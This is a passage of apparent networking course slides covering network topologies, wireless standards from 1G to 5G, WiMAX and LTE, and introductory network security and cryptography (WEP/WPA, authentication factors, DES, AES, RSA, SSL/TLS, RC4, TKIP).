4) Linear Bus network is mostly used in small networks. Good for LAN.

Disadvantages (Drawbacks) of Linear Bus Topology

1)  There is a limit on central cable length and number of nodes that can be connected.
2)  Dependency on central cable in this topology has its disadvantages. If the main cable
(i.e. bus ) encounters   some problem, whole network breaks down.
3)  Proper termination is required to dump signals. Use of terminators is must.
4)  It is difficult to detect and troubleshoot fault at individual station.
5)  Maintenance costs can get higher with time.
6)  Efficiency of Bus network reduces, as the number of devices connected to it increases.
7)  It is not suitable for networks with heavy traffic.
8)  Security is very low because all the computers receive the sent signal from the source.
 Star Topology
• In Star topology, all the components of network are
connected to the central device called “hub” which may
be a hub, a router or a switch.
• All the workstations are connected to central device with
a point-to-point connection.
• All the data on the star topology passes through the
central device before reaching the intended destination.
• Hub acts as a junction to connect different nodes
present in Star Network, and at the same time it
manages and controls whole of the network.
• Depending on which central device is used, “hub” can
act as repeater or signal booster.
• Central device can also communicate with other hubs of
different network.
• Unshielded Twisted Pair (UTP) Ethernet cable is used to
connect workstations to central node.
 Star Topology
• Advantages of Star Topology
• 1)  As compared to Bus topology it gives far much better performance, signals don’t
necessarily get transmitted to all the workstations. A sent signal reaches the intended
destination after passing through no more than 3-4 devices and 2-3 links. Performance
of the network is dependent on the capacity of central hub.
2)  Easy to connect new nodes or devices. In star topology new nodes can be added
easily without affecting rest of the network. Similarly components can also be removed
easily.
3)  Centralized management. It helps in monitoring the network.
4)  Failure of one node or link doesn’t affect the rest of network. At the same time its
easy to detect the failure and troubleshoot it.

Disadvantages of Star Topology

• 1)  Too much dependency on central device has its own drawbacks. If it fails whole
network goes down.
2)  The use of hub, a router or a switch as central device increases the overall cost of the
network.
3)   Performance and as well number of nodes which can be added in such topology is
depended on capacity of central device.
• In Ring Topology, all the nodes are connected to each-other in
such a way that they make a closed loop.
• Each workstation is connected to two other components on
either side, and it communicates with these two adjacent
neighbours. Ring
• Data travels around the network, in one direction.
• Sending and receiving of data takes place by the help of TOKEN. Topolog
• Token Passing (in brief) : Token contains a piece of information
which along with data is sent by the source computer.
• This token then passes to next node, which checks if the signal
y
is intended to it.
• If yes, it receives it and passes the empty token into the
network, otherwise passes token along with the data to next
node.
• This process continues until the signal reaches its intended
destination.
The nodes with token are the ones only allowed to send data.
• Other nodes have to wait for an empty token to reach them.
This network is usually found in offices, schools and small
buildings.
 Ring Topology
• Advantages of Ring Topology
•
1)   This type of network topology is very organized. Each node gets to send the data when
it receives an   empty token. This helps to reduces chances of collision. Also in ring topology
all the traffic flows in only one  direction at very high speed.
2)   Even when the load on the network increases, its performance is better than that of
Bus topology.
3)   There is no need for network server to control the connectivity between workstations.
4)   Additional components do not affect the performance of network.
5)   Each computer has equal access to resources.

Disadvantages of Ring Topology

•
1)   Each packet of data must pass through all the computers between source and
destination. This makes it slower than Star topology.
2)   If one workstation or port goes down, the entire network gets affected.
3)   Network is highly dependent on the wire which connects different components.
4)   Network cards are expensive as compared to Ethernet cards and hubs.
• In a mesh network topology, each of the network node, computer
and other devices, are interconnected with one another.
• Every node not only sends its own signals but also relays data from
other nodes.
• In fact a true mesh topology is the one where every node is
connected to every other node in the network.
• This type of topology is very expensive as there are many redundant
connections, thus it is not mostly used in computer networks.
Mesh
• It is commonly used in wireless networks.
• Flooding or routing technique is used in mesh topology.
1)Full Mesh Topology:-
Topology
• In this, like a true mesh, each component is connected to every
other component.
• Even after considering the redundancy factor and cost of this
network, its main advantage is that the network traffic can be
redirected to other nodes if one of the nodes goes down.
• Full mesh topology is used only for backbone networks.

2) Partial Mesh Topology:-

• Here, some of the systems are connected in similar fashion as in
mesh topology while rests of the systems are only connected to 1 or
2 devices.
• It can be said that in partial mesh, the workstations are ‘indirectly’
connected to other devices. This one is less costly and also reduces
redundancy.
 Mesh Topology
• Advantages of Mesh topology
•
1) Data can be transmitted from different devices simultaneously. This topology can
withstand high traffic.
2) Even if one of the components fails there is always an alternative present. So data
transfer doesn’t get affected.
3) Expansion and modification in topology can be done without disrupting other nodes.

Disadvantages of Mesh topology

•
1) There are high chances of redundancy in many of the network connections.
2) Overall cost of this network is way too high as compared to other network topologies.
3) Set-up and maintenance of this topology is very difficult. Even administration of the
network is tough.
• Tree Topology integrates the
characteristics of Star and Bus
Topology.
Tree
• In Tree Topology, the number of Star Topology
networks are connected using Bus.
• This main cable seems like a main
stem of a tree, and other star
networks as the branches.
• It is also called Expanded Star
Topology.
• Ethernet protocol is commonly used
in this type of topology.
 Tree Topology
• Advantages of Tree Topology
• 1. It is an extension of Star and bus Topologies, so in networks where these
topologies can't be implemented individually for reasons related to scalability, tree
topology is the best alternative.
2. Expansion of Network is possible and easy.
3. Here, we divide the whole network into segments (star networks), which can be
easily managed and maintained.
4. Error detection and correction is easy.
5. Each segment is provided with dedicated point-to-point wiring to the central hub.
6. If one segment is damaged, other segments are not affected.

Disadvantages of Tree Topology

• 1. Because of its basic structure, tree topology, relies heavily on the main bus cable,
if it breaks whole network is crippled.
2. As more and more nodes and segments are added, the maintenance becomes
difficult.
3. Scalability of the network depends on the type of cable used.
 Hybrid
• Advantages of Hybrid Network Topology
Topology
•
1)  Reliable : Unlike other networks, fault detection and troubleshooting is easy in this type of topology. The part in
which fault is detected can be isolated from the rest of network and required corrective measures can be taken,
WITHOUT affecting the functioning of rest of the network.
2) Scalable: Its easy to increase the size of network by adding new components, without disturbing existing
architecture.
3) Flexible: Hybrid Network can be designed according to the requirements of the organization and by optimizing
the available resources. Special care can be given to nodes where traffic is high as well as where chances of fault are
high.
4) Effective: Hybrid topology is the combination of two or more topologies, so we can design it in such a way that
strengths of constituent topologies are maximized while there weaknesses are neutralized. For example we saw Ring
Topology has good data reliability (achieved by use of tokens) and Star topology has high tolerance capability (as
each node is not directly connected to other but through central device), so these two can be used effectively in
hybrid star-ring topology.

Disadvantages of Hybrid Topology

•
1)  Complexity of Design: One of the biggest drawback of hybrid topology is its design. Its not easy to design this
type of architecture and its a tough job for designers. Configuration and installation process needs to be very
efficient.
2)  Costly Hub: The hubs used to connect two distinct networks, are very expensive. These hubs are different from
usual hubs as they need to be intelligent enough to work with different architectures and should function even if a
part of network is down.
3)  Costly Infrastructure: As hybrid architectures are usually larger in scale, they require a lot of cables, cooling
systems, sophisticated network devices, etc.
 OS vs NOS (network operating system)
• Similarities
– Manage resources
– Manage access and permissions
– System software
• Differences
– NOS is more expensive to obtain, install and maintain
– NOS is installed on network servers
– NOS can also be found in a router or a hardware firewall
– NOS has the ability to manage multiple users, security
policies and other functions of a network
 Software and Hardware firewall
• Similarities
– Both control data flow
– Same purpose – security
• Differences
– HW firewall used to protect many devices
– HW firewall more expensive
 Wireless Communication
• Uses radio transmissions
 Advantages and disadvantages of wireless
networks
• Advantages:
– Easy to set up / plan (no cabling required)
– Costs less
– Can be installed almost anywhere (no need to drill holes etc.)
– Allows mobility (computers don't have to stay in same place)
– Easy to add new participants to network
– Lot of public access points
– Flexibility and Convenience while the user is on the move
• Disadvantages:
– Traffic through network can be intercepted by unauthorized people
– Slow transmission speeds, high error rates
– Interference from other wireless stations, cables etc. can happen, reducing speed
– Affected by weather
– Health hazards
– Many different standards may not compatible with each other (There are 5 different WLAN
standards). Making wireless access points compatible with each standard is complicated (different
antenna) and resource consuming, and can influence transmission speeds for individual participants.
• wireless networks have led to changes in working patterns, social activities and raised
health issues.
• Comparison of Ethernet and Wireless in terms of
reliability of transmission
– WIRELESS The reliability of wireless depends on the strength
of the wireless signal/distance from router; on the
topology/shape of the surroundings; on interference/number
of simultaneous connections on an access point;

– ETHERNET Ethernet is more reliable as the strength of the

signal is independent from the distance from the router; There
is no issue with the topology/shape of the surrounding, as long
as the user has a connection; connection depends on
condition of cables – no loose or broken cable connections;
 Hardware and software components of a
wireless network
• Wireless connections use radio waves or infrared signals to convey data.
• The key hardware components of a wireless computer network include:
– Modem to connect to the internet
– Wireless routers have a similar function to traditional routers for wired Ethernet networks.
Acts as Access point which allows data transfer between a device and a network)
– Wireless network adapters (or wireless NICs/wireless network cards) must be required for
each device on a wireless network
– Wireless Access points (WAP) allow the wireless networks to join an existing wired
network.
– Wi-Fi wireless antenna which access points and routers often utilize, significantly increase
the communication range of the wireless radio signal. 
– Wireless repeater connects to a router or access point. Also known as signal boosters or
range expanders, repeaters receive signal and rebroadcast it.
– Ethernet to Wireless Access Point or Ethernet to wireless repeater – It uses ethernet
cables to carry signals to wireless repeater or WAP
– Ethernet over power line to wireless repeater or WAP – It uses power lines to carry the
signal
 Hardware and software components of a
wireless network
• Software needed
– DHCP – Dynamic Host Configuration protocol allows server to automatically assign an IP address
to a client device
• When a wireless device enters the wireless network, it may acquire an IP address from the router
• DHCP can be disabled and each network device can be configured with a static IP address
– Software Firewall
• Security system which determines what comes in and goes out
– Name / SSID – Service set identification is a set of 32 alphanumeric characters, used to
differentiate one WLAN from other, case sensitive
– NIC drivers – device driver for the NIC card. This controls the hardware of the card. Translator
between the wireless card and the OS / application
– OS – handles system resources and is responsible for managing all the protocols, hardware,
applications
– Security Software – All software that prevents unauthorized access. It includes access control,
firewall, anti-spyware, antivirus, cryptographic software, anti key loggers, anti tamper software,
anti subversion software, intrusion detection system, intrusion prevention system and sandbox
– WAP Wireless Application Protocol for accessing information over a mobile wireless network. It
allows users to access the internet, exchange emails, surf the web. It is used in radio transceivers
and cellular phones
 Characteristics of wireless networks
• Wi-Fi / WLAN
– Wi-Fi is short for wireless fidelity
– The standard for Wi-Fi is 802.11
– Creates local area networks that device can connect to
– Also called Wireless LAN (WLAN) based on 802.11
– Short range network with high bandwidth
 Lan- wired and wireless
• Difference in physical and data link protocols
• Access points function as the bridge
• Devices can stay connected as it roams from one place
to another. (Though actually the device has to move
across access points and that takes some time to
disconnect and reconnect)
• They have unique security considerations and specific
interoperability requirements
• Requires different hardware
• They offer performance that differs from wired LANs.
 Points to consider
• How many users require mobility?
• What are the applications that will run over the WLAN? Helps to determine
bandwidth requirements
• Choose the right technology
– 802.11b offers interoperability, slowest and least expensive standard, 802.11b
transmits in the 2.4 GHz frequency band of the radio spectrum. It can handle up to 11
megabits of data per second
– 802.11a - higher throughput per user. Limited interoperability. transmits at 5 GHz and
can move up to 54 megabits of data per second.
– 802.11g transmits at 2.4 GHz like 802.11b, but it's a lot faster -- it can handle up to 54
megabits of data per second.
– 802.11n (300 mbps) and 802.11ac (1.2 Gbps) are the latest
• Data rate requirement
– Selecting only the highest data rate will require a greater number of APs to cover a
specific area
 Two basic modes of 802.11 networks
• Infrastructure mode:
• each wireless client connects directly to a central device called
Access Point (AP)
• no direct connection between wireless clients
• AP acts as a wireless hub that performs the connections and
handles them between wireless clients
 AP handles:
• Client authentication,
• Authorization
• Link-level data security
• Ad-hoc mode:
• Each wireless client connects directly with each other
• No central device managing the connections
• Rapid deployment of a temporal network where no
infrastructures exist (advantage in case of disaster…)
• Each node must maintain its proper authentication list
 Wireless communication

• 1G
– 1G refers to the first generation of wireless telephone
technology, mobile telecommunications which was first
introduced in 1980s and completed in early 1990s.
– It’s Speed was upto 2.4kbps, allowed voice calls.
– It used Analog Signal and AMPS was first launched in USA as
1G mobile systems
• Features
– Poor Voice Quality
– Poor Battery Life
– Large Phone Size
– No Security
– Limited Capacity
– Poor Handover
 Wireless communication

• 2G
– 2G technology refers to the 2nd generation which is based on
GSM.
– It was launched in Finland in the year 1991 and used digital
signals.
– It’s data speed was upto 64kbps.
• Features include:
– services such as text messages, picture messages and MMS
(multi media message)
– better quality and capacity.
• Drawbacks:
– 2G requires strong digital signals to help mobile phones work.
– Was unable to handle complex data such as Videos.
 Wireless communication
• 2.5G is a technology between the second (2G)
and third (3G) generation of mobile telephony.
• It is sometimes described as 2G Cellular
Technology combined with GPRS.
• Features Includes:
– Phone Calls
– Send/Receive E-mail Messages
– Web Browsing
– Speed : 64-144 kbps
 VoIP
• VoIP, or Voice over Internet Protocol, is a method for taking analog audio signals, like the kind
you hear when you talk on the phone, and turning them into digital data that can be transmitted
over the Internet.
• Usually, voice go via circuit switched connections.
• In VoIP, voice go via packet switched connections. (voice converted to digital, broken down into
packets)
• Audio (and video) stream transmitted over internet; Broadband internet connection needed;
• That can be integrated in an office desktop computer; with collaboration desk
endpoints/webcams/desktop computer/widgets/ touch screen/specific applications/IP phones;
• Dependent on bandwidth, routers (QOS)

• Quality of service (QoS) is the description or measurement of the overall performance of a

service, such as a telephony or computer network or a cloud computing service, particularly the
performance seen by the users of the network.
• To quantitatively measure quality of service, several related aspects of the network service are
often considered, such as packet loss, bit rate, throughput, transmission delay, availability, jitter,
etc.
• Quality of service is the ability to provide different priority to different applications, users, or
data flows, or to guarantee a certain level of performance to a data flow.
 Wireless communication

• 3G
– 3G technology refer to third generation which was introduced in year 2000s.
– Data Transmission speed increased to 144kbps- 2Mbps.
– Typically called Smart Phones and features increased its bandwidth and data transfer rates
to accommodate web-based applications and audio and video files.
• Features Include:
– Providing Faster Communication
– More secure than 2G
– Send/Receive Large Email Messages
– High Speed Web / More Security
– Video Conferencing / 3D Gaming
– TV Streaming/ Mobile TV/ Phone Calls
– Large Capacities and Broadband Capabilities
• Drawbacks:
– Expensive fees for 3G Licenses Services
– It was challenge to build the infrastructure for 3G
– High Bandwidth Requirement
– Expensive 3G Phones.
– Large Cell Phones
 Wireless Access – Adv & Disadv
• An advantage is that users can access quickly with mobile
devices; Anywhere in the building and do not need to be
at the workstation;
• Users can logon with their own devices (if properly
configured); More familiar with interface/functions;
• One disadvantage is security as it could be possible to get
to the server from a nearby neighbourhood if not very
secure; Less secure than the cabled system in the building;
• Wireless signal could be weak in some parts of the
building; Leading to frustrated/ineffective employees;
 Wireless communication

• 4G
– 4G technology refer to or short name of fourth Generation which was
started from late 2000s.
– Capable of providing 100Mbps – 1Gbps speed.
• Features Include:
– More Security
– High Speed
– High Capacity
– Low Cost Per-bit
• Drawbacks:
– Battery use is more
– Hard to implement
– Need complicated hardware
– Expensive equipment required to implement next generation
network.
 Wireless communication

• LTE – Long term Evaluation

– Standard for wireless communication for high speed
data
– Download rates – 300 mbps, upload rates – 5 mbps
– LTE Advanced with more data capacity, two to three
times faster than today’s LTE, robust with fewer
dropped connections as you move around.
 Wireless communication

• 5G
– 5G promises significantly faster data rates, higher connection density, much
lower latency, among other improvements
– Data rate of 1 gbps – 20 gbps
– Every day devices connected paving way for IOT (Internet of Things)
– started from late 2010s.
– Complete wireless communication with almost no limitations.
– It is highly supportable to WWWW (Wireless World Wide Web).
• Features Include:
– High Speed, High Capacity
– 5G technology providing large broadcasting of data in Gbps .
– Multi – Media Newspapers, watch T.V programs with the clarity as to that of an
HD Quality.
– Faster data transmission compared to previous generations.
– Large Phone Memory, Dialing Speed, clarity in Audio/Video.
– Support interactive multimedia ,voice, streaming video, Internet and other
– 5G is More Effective and More Attractive.
Parameters 1G 2G 3G 4G
Location of first
USA Finland Japan South Korea
commercialization
AMPS
(Advanced
IMT2000,
Technology Mobile Phone IS-95, GSM LTE, WiMAX
System), NMT, WCDMA
TACS
Circuit
switching for
Circuit Voice and Packet switching
Switching type except for Air Packet switching
switching Packet
Interface
switching for
Data
Speed (data rates) 2.4 Kbps to 14.4 Kbps 3.1 Mbps 100 Mbps
14.4 kbps
Digital
Digital version
Special First wireless of 1G broadband, Very high
Characteristic communication speed speeds, All IP
technology
increments
Parameters 1G 2G 3G 4G
Supports Voice only Voice and Data Voice and Data Voice and Data
Internet service No Internet Narrowband Broadband Ultra Broadband
Bandwidth Analog 25 MHz 25 MHz 100 MHz
Simpler (less Multimedia Speed, High
features (SMS, High security, speed handoffs,
complex)
Advantage MMS), Internet international MIMO
network
access and SIM roaming technology,
elements introduced Global mobility
Limited capacity, High power
Hard to
not secure, poor Low network consumption, implement,
battery life, large Low network
Disadvantages range, slow data complicated
phone size, coverage, High
background rates cost of spectrum hardware
required
interference licence
Voice calls, Short High speed
Video applications,
messages,
Applications Voice Calls browsing conferencing, mobile TV,
mobile TV, GPS Wearable
(partial)
devices
 Wireless communication
• WiMAX
– Worldwide Interoperability for Microwave Access
– Based on Wireless MAN technology
– IEEE 802.16
– Provide portable broadband connectivity
– standardized wireless version of Ethernet intended primarily as an
alternative to wire technologies (such as Cable Modems, DSL and T1 links)
to provide broadband access to customer premises.
– WiMAX would operate similar to WiFi, but at higher speeds over greater
distances and for a greater number of users.
– WiMAX has the ability to provide service even in areas that are difficult for
wired infrastructure to reach and the ability to overcome the physical
limitations of traditional wired infrastructure.
– Designed to make high quality, long range data and voice communications
affordable
– Maximum range is 30 miles
– Speed – about 40 Mbps
– Wimax 2.0 1 gbps for fixed devices, 100 mbps for mobile devices
– Better than WiFi in terms of range, scalability, bit rate and QoS
– LOS offers more stability
• What Is DSL?
– Telephones are traditionally connected to a service
provider's network through a local loop -- a pair of twisted
copper wires.
– Human voices have a frequency range of 0 to 3,400 hertz,
but copper telephone wires have the ability to handle
frequencies up to several million hertz.
– DSL technology transfers digital data in frequency ranges
higher than 3,400 hertz, allowing a regular copper
telephone line to be used for both voice and data transfer.
• What Is a T1 Line?
– High speed
– dedicated four-wire fibre access
 WIMAX vs LTE
• Both are considered 4G, all IP technology
• Different channels
• LTE is compatible with 3G n 2G, but WIMAX is
not
• Building a LTE network is more expensive
• LTE allows much greater speed for mobile
users
• WIMAX is not popular
 Wireless networks

• Sensor networks
– Temperature, sound, pressure sensors placed at fixed
locations and are linked by wireless network to
perform distributed sensing tasks
– Used for environmental sampling, security &
surveillance, health care monitoring, underwater
measurements etc
 Network Security - Problems
• Intruders, hackers, unauthorized users can
– Disable operations
– Disturb the privacy of legitimate users
– Gain unauthorized access
– Insert viruses or malicious code
– Launch denial of service attacks
– Steal identities
– Steal devices
– Steal sensitive information that is stored or transmitted
 Encryption
• It uses complex mathematical algorithms and encryption keys to alter a
message into a form that is not understandable to an unauthorized
person.
• Only the person with the correct key can decode the message and read
it.
• Symmetric Key Encryption
– Single key encryption or secret key encryption
– Same key is used for encryption and decryption
– Each device has a secret code that is used to encrypt a packet
– The receiving device should know and use the same key to decode the packet
received.
– DES (Data Encryption Standard) uses a 56 bit key.
– 72057594037927936 possible combinations
– A brute force attack of modern computer can crack the code
– AES (Advanced Encryption Standard) used 128,192,256 bit key
– Uses less computer resources compared to the Public Key Encryption
 Encryption
• Public Key Encryption
– Asymmetric Encryption
– Uses public key for encryption and private key for
decryption
– These two keys are mathematically linked
– This type of encryption is used on the internet
– Transport Layer Security (TLS) and Secure Socket
Layer (SSL) are based on public key encryption
– Messages take more time to encrypt and decrypt
– The authenticity of the public key needs to be
verified
 Methods of Network Security
• Use user id & password to access
– weak passwords are easy to crack
– Atleast eight characters, a combination of numbers, upper case, lower case, symbols
• Install anti virus software
– To prevent, detect and remove malicious software
• Use a password to access the web interface that is used to setup the wireless routers or
access points
• Turn on / off wireless connectivity as required
• Enable / Disable SSID broadcast
– Wireless router or access point broadcasts its SSID.
– All wireless devices in range can identify it
– Force devices to enter the SSID manually by disabling the display of name
– But still a smart intruder can easily detect hidden wireless networks and sniffer tools can get the SSID
• Block access to wireless devices by MAC address
– Every NIC has unique MAC address (12 digits/chars with a size of 48 bit)
– Example – 00:40:96:9d:68:16 (in hex format)
– Provide access to devices based on MAC addresses
– MAC spoofing becomes a problem
– All source MAC addresses are trusted when the Trusted MAC list is empty.
 Different methods of network security
• Wireless Encryption
• Wired Equivalent Privacy (WEP)
– Often mistakenly referred to as the Wireless Encryption Protocol
– can be cracked by a malicious individual within minutes.
– Introduced in 1999 to provide data confidentiality
– 40/64 bit and 128 bit encryption key lengths
– Adds processing overheads that slow down the wireless connection
– It’s usually easily identifiable, since the password is generally a
series of hexadecimal characters (that is: 0–9, A–F).
– Easy to crack
– It offers interoperability with older devices
 Different methods of network security
• Wireless Encryption
• Wi-Fi Protected Access (WPA)
• Adopted in 2003 by Wi-Fi alliance
• it’s more secure and more resource intensive.
• successor WPA2 (2004)
• The differences between WPA and WPA2 lie in the encryption
methods used, TKIP and AES respectively.
• Temporal Key Integrity Protocol (TKIP) dynamically changes keys
as the system is used
 Different methods of network security
• Wireless Protected Setup (WPS)
• Also called Quick Security Setup
• the goal of the protocol is to allow home users who know little of wireless security and may be
intimidated by the available security options to set up Wi-Fi Protected Access, as well as making it easy
to add new devices to an existing network without entering long passphrases
• It requires a WPS router and WPS compatible devices.
• Should be switched off when not used
• Methods
– PIN method
– PIN has to be read from either a sticker or display on the new wireless device.
– This PIN must then be entered at the network's access point.
– Alternately, a PIN provided by the access point may be entered into the new device.
– Push button method
– the user has to push a button on both the access point and the new wireless client device.
– Near Field Communication method
– the user has to bring the new client close to the access point to allow a near field communication between the
devices.
– USB transfer method
– the user uses a USB flash drive to transfer data between the new client device and the network's access point.
 Different methods of network security
• Wireless Encryption
• Pre-shared Key (PSK)
• PSK is the most common method of securing a wireless network, mostly because
it’s the easiest to implement and doesn't require a separate authentication server.
• In this method, everyone on your secure wireless network connects to access
points utilizing the same password, which is probably known by everyone. For a
home environment, this is probably OK.
• You’d assume that most of the people you’re letting on your network are your
friends or family, and – depending on the quality of your friends and family – you
can probably trust them with access to your network.
• The trouble with PSK is, especially for businesses, that if you want to remove one
user’s access to your network, you need to give everybody else the new key.
• This may include all of your employees, contractors, and any other guests that
have been on your network.
• It could be a lot of work for a large company, especially if it’s all because of one
employee leaving the company.
 Different methods of network security
• Firewall
– Its primary objective is to control the incoming and outgoing network traffic by
analysing the data packets and determining whether it should be allowed
through or not, based on a predetermined rule set.
– It may be hardware (Built in router firewall) or software.
• Intrusion detection system (IDS) is a passive detection system that can
detect the presence of an attack and logs/stores that information.
• Intrusion prevention system (IPS) is a network device that continually
scans across the network, searching for inappropriate activity and if a
potential threat is present, the IPS may shut it down.
• Prevent Physical Access
– Possible for a building to be shielded from electromagnetic interference
– Or Directional antennas can be used to restrict the spread of the signal
– Costs are more
• Use encryption software for sensitive information sent over the internet
• One factor authentication
• This is something that the user knows, such as a password.
• Advantages
• The access is unique, as only you know it.
• Also, this is a very easy way for you to access the network, since
all you do is input a password.
• Disadvantages
• The major one is that generally people do use easy passwords
which are quite easy to guess/bruteforce.
• Also, a lot of people have their unhashed passwords saved on
their website, meaning that it is quite easy to obtain them.
• Two factor authentication
• Two factor authentication requires something you have
and something you know.
• A second authentication factor enhances security by
introducing an independent type of ID, one only the
original person should be able to provide, such as a
thumb print or a swipe card.
• Example - Swiping a card and entering a PIN.
• Disadvantage
• If you lose one of these, you are not able to access.
• Three factor authentication
• In addition to the previous two factors, the third factor is
“something a user is.” 
• Examples of a third factor are all biometric such as the user’s
voice, hand configuration, a fingerprint, a retina scan or similar. 
• The most recognized form of three-factor authentication is
usually the retina scan.
• An advantage to three factor authentication is that it is
obviously going to be more secure to any of the other two
factor authentications.
• Disadvantage - if you do not have access to one of them, you
are unable to gain access.
 Block Vs Stream Cipher
• A block cipher is a method of encrypting text (to
produce ciphertext) in which a cryptographic key and
algorithm are applied to a block of data (for example,
64 contiguous bits) at once as a group rather than to
one bit at a time.
• A stream cipher is a method of encrypting text (to
produce ciphertext) in which a cryptographic key and
algorithm are applied to each binary digit in a data
stream, one bit at a time. This method is not much
used in modern cryptography.
 DES (Symmetric)
• DES works by using the same key to encrypt and decrypt a message,
so both the sender and the receiver must know and use the same
private key.
• The Data Encryption Standard is a block cipher, meaning a
cryptographic key and algorithm are applied to a block of data
simultaneously rather than one bit at a time.
• To encrypt a plaintext message, DES groups it into 64-bit blocks.
• Each block is enciphered using the secret key into a 64-bit
ciphertext by means of permutation and substitution.
• The process involves 16 rounds and can run in four different modes,
encrypting blocks individually or making each cipher block
dependent on all the previous blocks.
• A round consists of several processing steps that include
substitution, transposition and mixing of the input plaintext and
transform it into the final output of ciphertext
 Substitution
• A substitution cipher is a method of encoding
by which units of plaintext are replaced with
ciphertext, according to a fixed system;
 Transposition
• A transposition cipher is a method of
encryption by which the positions held by
units of plaintext (which are commonly
characters or groups of characters) are shifted
according to a regular system, so that the
ciphertext constitutes a permutation of the
plaintext.
• Example – Columnar Transposition
 DES (Symmetric)
• Decryption is simply the inverse of encryption, following the
same steps but reversing the order in which the keys are
applied.
• For any cipher, the most basic method of attack is brute force,
which involves  trying each key until you find the right one.
• The length of the key determines the number of possible keys --
and hence the feasibility -- of this type of attack.
• DES uses a 64-bit key, but eight of those bits are used for parity
checks, effectively limiting the key to 56-bits.
• Hence, it would take a maximum of 2^56, or
72,057,594,037,927,936, attempts to find the correct key.
• Triple DES (3DES) performs three iterations of the DES algorithm
• 3DES encryption is obviously slower than plain DES.
 AES (Symmetric)
• The Advanced Encryption Standard or AES is a symmetric block cipher
• AES is more secure than its predecessors -- DES and 3DES -- as the
algorithm is stronger and uses longer key lengths.
• It also enables faster encryption than DES and 3DES, making it ideal
for software applications, firmware and hardware that require either
low-latency or high throughput, such as firewalls and routers.
• It is used in many protocols such as SSL/TLS and can be found in most
modern applications and devices that need encryption functionality.
• AES comprises three block ciphers, AES-128, AES-192 and AES-256.
Each cipher encrypts and decrypts data in blocks of 128 bits using
cryptographic keys of 128-, 192- and 256-bits, respectively.
• There are 10 rounds for 128-bit keys, 12 rounds for 192-bit keys, and
14 rounds for 256-bit keys.
 RSA (Public)
• RSA is a cryptosystem for public-key encryption, and is widely used for securing
sensitive data, particularly when being sent over an insecure network such as the
Internet.
• In RSA cryptography, both the public and the private keys can encrypt a message; the
opposite key from the one used to encrypt a message is used to decrypt it.
• This attribute is one reason why RSA has become the most widely used asymmetric
algorithm
• It provides a method of assuring the confidentiality, integrity, authenticity and non-
reputability of electronic communications and data storage
• Nonrepudiation is a way to guarantee that the sender of a message cannot later deny
having sent the message and that the recipient cannot deny having received the
message.
• RSA derives its security from the difficulty of factoring large integers that are the
product of two large prime numbers.
• Multiplying these two numbers is easy, but determining the original prime numbers
from the total -- factoring -- is considered infeasible due to the time it would take
even using today’s super computers.
 SSL
• The Secure Sockets Layer (SSL) is a computer networking protocol
that manages server authentication, client authentication and
encrypted communication between servers and clients.
• SSL uses a combination of public-key and symmetric-key
encryption to secure a connection between two machines,
typically a Web or mail server and a client machine,
communicating over the Internet or an internal network.
• Using the OSI reference model as context, SSL runs above the
TCP/IP protocol, which is responsible for the transport and
routing of data over a network, and below higher-level protocols
such as HTTP and IMAP, encrypting the data of network
connections in the application layer of the Internet Protocol suite.
 SSL
• The SSL protocol includes two sub-protocols: the record protocol and the "handshake"
protocol.
• These protocols allow a client to authenticate a server and establish an encrypted SSL
connection.
• In what's referred to as the "initial handshake process," a server that supports SSL
presents its digital certificate to the client to authenticate the server's identity.
• The authentication process uses public-key encryption to validate the digital certificate
and confirm that a server is in fact the server it claims to be.
• Once the server has been authenticated, the client and server establish cipher settings
and a shared key to encrypt the information they exchange during the remainder of the
session.
• This provides data confidentiality and integrity.
• This whole process is invisible to the user.
• For example, if a webpage requires an SSL connection, the URL will change from HTTP to
HTTPS and a padlock icon appears in the browser once the server has been authenticated.
• The handshake also allows the client to authenticate itself to the server. In this case, after
server authentication is successfully completed, the client must present its certificate to
the server to authenticate the client's identity before the encrypted SSL session can be
established.
 TLS
• Transport Layer Security (TLS) is a protocol that ensures privacy
between communicating applications and their users on the Internet.
• When a server and client communicate, TLS ensures that no third
party may eavesdrop or tamper with any message.
• TLS is the successor to the Secure Sockets Layer (SSL).
• TLS is composed of two layers: the TLS Record Protocol and the TLS
Handshake Protocol.
• The TLS Handshake Protocol allows the server and client to
authenticate each other and to negotiate an encryption algorithm
and cryptographic keys before data is exchanged.
• The TLS Record Protocol provides connection security with some
encryption method such as the Data Encryption Standard (DES).
• The TLS Record Protocol can also be used without encryption.
 SSL vs TLS
• There are two distinct ways that a program can initiate a secure connection with a
server:
• By Port (a.k.a. explicit):
– Connecting to a specific port means that a secure connection should be used.  
– For example, port 443 for https (secure web), 993 for secure IMAP, 995 for secure POP, etc.  
– These ports are setup on the server ready to negotiate a secure connection first, and do
whatever else you want second.
• By Protocol (a.k.a. implicit):
– These connections first begin with an insecure “hello” to the server and only then switch to
secured communications after the handshake between the client and the server is
successful.
– If this handshake fails for any reason, the connection is severed.  
– A good example of this is the command “STARTTLS” used in outbound email (SMTP)
connections.
• The “By Port” method is commonly referred to as “SSL” or “explicit” and the “By
Protocol” method is commonly referred to as “TLS” or “implicit” in many program
configuration areas.
 Initialization Vector
• An initialization vector (IV) is an arbitrary number that can be used along with a secret
key for data encryption.
• This number, also called a nonce, is employed only one time in any session. 
• The use of an IV prevents repetition in data encryption, making it more difficult for a
hacker using a dictionary attack to find patterns and break a cipher.
• For example, a sequence might appear twice or more within the body of a message.
• If there are repeated sequences in encrypted data, an attacker could assume that the
corresponding sequences in the message were also identical.
• The IV prevents the appearance of corresponding duplicate character sequences in the
ciphertext. 
• The ideal IV is a random number that is made known to the destination computer to
facilitate decryption of the data when it is received.
• The IV can be agreed on in advance, transmitted independently or included as part of
the session setup prior to exchange of the message data.
• The length of the IV (the number of bits or bytes it contains) depends on the method of
encryption.
• The IV length is usually comparable to the length of the encryption key or block of the
cipher in use.
• IV changes for every block of data
 RC4
• RC4 (Rivest Cipher 4) is a stream cipher.
• While remarkable for its simplicity and speed in software,
multiple vulnerabilities have been discovered in RC4,
rendering it insecure.
• Particularly problematic uses of RC4 have led to very
insecure protocols such as WEP.
• RC4 generates a pseudorandom stream of bits (a keystream).
• As with any stream cipher, these can be used for encryption
by combining it with the plaintext using bit-wise exclusive-or
• decryption is performed the same way
 TKIP
• TKIP is a suite of algorithms that works as a "wrapper" to WEP, which
allows users of legacy WLAN equipment to upgrade to TKIP without
replacing hardware.
• TKIP uses the original WEP programming but "wraps" additional code at
the beginning and end to encapsulate and modify it.
• Like WEP, TKIP uses the RC4 stream encryption algorithm as its basis.
• The new protocol, however, encrypts each data packet with a unique
encryption key, and the keys are much stronger than those of its
predecessor.
• To increase key strength, TKIP includes four additional algorithms:
